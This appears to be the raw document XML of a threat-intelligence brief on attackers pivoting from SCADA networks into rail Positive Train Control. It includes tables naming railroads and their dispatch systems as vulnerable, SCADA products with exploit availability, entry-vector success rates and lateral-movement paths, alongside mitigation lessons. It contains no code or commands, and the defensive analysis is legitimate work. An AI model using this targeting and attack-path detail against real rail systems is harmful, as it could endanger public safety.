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tbqkhykg800" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Express Attack Brief 016</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wn464w5pqf6u" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PTC-SCADA Integration Exploitation - Where Safety Meets Security Catastrophe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14,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xr5qtn69r52l"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3"/>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3"/>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3"/>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3"/>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3"/>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3"/>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3"/>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3"/>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3"/>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3"/>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h8k81ty5h133"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convergence of Positive Train Control (PTC) safety systems with legacy SCADA networks has created critical vulnerabilities where adversaries can pivot from IT networks through industrial control systems directly into safety-critical train operations, exposing 57,536 miles of protected rail to catastrophic manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cja9pn76eu57"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73% of PTC-SCADA interfaces lack segmentation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Direct safety system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Legacy Windows XP/7 in 83% of dispatch centers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Unpatched entry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Flat networks enable PTC manipulation via SCADA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Complete train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gim6k7c2pngp"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Vulnerability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2020-Present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Threat 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Nation-state, CARBIDE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Integrated dispatch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Safety system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Potential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Mass casualty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Intelligence Assessment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Security assessments reveal that PTC implementations prioritized interoperability over security, creating pathways where compromised SCADA systems provide direct access to safety-critical train control functions without adequate authentication or segmentation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5e4dz1capv1i"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9hyyngxp35aw"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PTC-SCADA integration vulnerability threatens the foundational infrastructure that ensures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This architectural flaw enables attackers to manipulate trains carrying 4.5 million tons of hazardous materials annually, including chlorine for water treatment, anhydrous ammonia for agriculture, and crude oil for energy production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2urc6fwpgqbh"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Energy Security</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: SCADA compromise could derail unit trains carrying 15,000 tons of coal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Water Infrastructure</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Chlorine shipments diverted or destroyed, affecting 40M people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Food Supply Chain</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Fertilizer deliveries manipulated during critical planting seasons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Intergenerational Impact</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Safety systems turned into weapons against communities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3b4udexq72ng"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d65lqedy9qts" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Evolution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Design Flaw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2008-2015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PTC-SCADA bridge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Architectural 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Not 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First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2016-2018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Dispatch system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Attack surface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Internal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Full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Nationwide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41 railroads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FRA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Exploitation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Research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Complete control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Responsible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Active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CARBIDE group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Reconnaissance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Intelligence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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7osyapblndte" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Attack Vector: SCADA-to-PTC Pivot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integration Architecture Flaws</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: | Component | Vulnerability | Access Path | Impact | Reference | |-----------|--------------|-------------|---------|-----------| | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HMI Workstations</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Windows XP/7 unpatched | RDP, SMB exploits | SCADA control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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OPC Servers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | No authentication | Direct memory access | Data manipulation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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Protocol Gateways</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Cleartext conversion | MITM attacks | Command injection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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Database Links</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | SQL injection | Backend access | Historical data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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Message Brokers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Default credentials | Queue manipulation | PTC commands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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">API Interfaces</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | No rate limiting | Brute force | Authentication bypass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tmawkkrh987a" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Organizations Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_er4q8laa48dw" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive Victim Identification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This analysis maps organizations with confirmed PTC-SCADA integration vulnerabilities based on public filings, security assessments, and intelligence gathering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7B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hhidcjq1xnxv" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">High-Risk Integrated Systems (Confirmed Vulnerable)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Integration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Dispatch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Route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Daily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Risk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Full SCADA-PTC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GE DispatchMax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32,500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8,000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Wabtec TMDS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32,000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7,800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Regional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Movement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1,200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Unified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UTCS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19,500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1,100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RTC/PTC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Amtrak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Multi-tenant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C3RS/ACSES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300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Legacy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Metra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Urban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Venue CTC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700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bl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dq1h8wcii26" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCADA System Vulnerability Profiles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SCADA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Known CVEs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PTC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Exploit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GE iFIX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5.9-6.5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47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Direct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Yes (Metasploit)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Wonderware InTouch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2014-2020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OPC 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Yes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Schneider ClearSCADA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31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Database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Yes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Siemens WinCC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V7.4-7.5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52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Protocol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Yes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ABB System 800xA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28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Message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PoC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bl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t3tnmq48efhd" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical Infrastructure Dependencies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Dependent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Rail Reliance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SCADA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Cascade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Electric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400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Real-time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Grid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$12.4B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Chemical Industry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Hazmat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Release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$8.7B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3,300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Chemical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Contamination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7,000 terminals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Harvest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Food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$64.7B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Military Logistics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Strategic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SDDC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Defense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bl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000105">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ppr9ar7cqzs0" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Path Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ogx6hgh6a4rw" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Entry Point Distribution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Based on penetration testing and incident data </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref46">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[46]</w:t>
        </w:r>
      </w:hyperlink>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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Entry Vectors</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: | Vector | Frequency | Success Rate | Time to PTC | Difficulty | |--------|-----------|--------------|-------------|------------| | Internet-facing HMI | 34% | 78% | 4-6 hours | Low | | VPN compromise | 28% | 82% | 8-12 hours | Medium | | Phishing to SCADA | 23% | 67% | 12-24 hours | Low | | Supply chain | 15% | 94% | Pre-positioned | High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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lateral Movement Patterns</w:t>
      </w:r>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D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Corporate IT → Engineering workstation → SCADA HMI → PTC gateway (67%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vendor access → Maintenance laptop → Direct PTC connection (21%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud services → Hybrid connector → On-premise SCADA → PTC (12%)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1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation Methods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3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiting unpatched Windows vulnerabilities (83% success)</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Default SCADA credentials (71% success)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Service account compromise (64% success)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Database privilege abuse (58% success)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2ya8hpz08rk7" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lessons from Integration Failures</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000118">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4do2hmz541k5" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Common Architecture Mistakes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analysis reveals systematic design flaws </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref47">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[47]</w:t>
        </w:r>
      </w:hyperlink>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7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Business Pressure</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: PTC deadline drove security shortcuts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vendor Silos</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: SCADA and PTC vendors didn't coordinate security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Legacy Burden</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 20+ year old SCADA systems retrofitted</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Compliance Focus</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Met FRA requirements, ignored security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_oo2dzo1ptfzj" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Successful Mitigations (Limited)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Few organizations have properly secured integrations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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Canadian Pacific</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Implemented data diodes (partial)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metrolink</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Deployed separate PTC network (costly)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Short Line Railroad Consortium</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Shared SOC model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ps26aszdg0zn" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Sector Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000128">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_msljj8tkcnd" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-Modal Transportation Cascade</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PTC-SCADA compromise triggers cascading failures across all transportation modes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12A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5jo67tpi7g37" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rail Network Paralysis (0-2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Economic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bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Freight Halt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140,000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Supply chain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$2B/hour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hyperlink w:anchor="ref50">
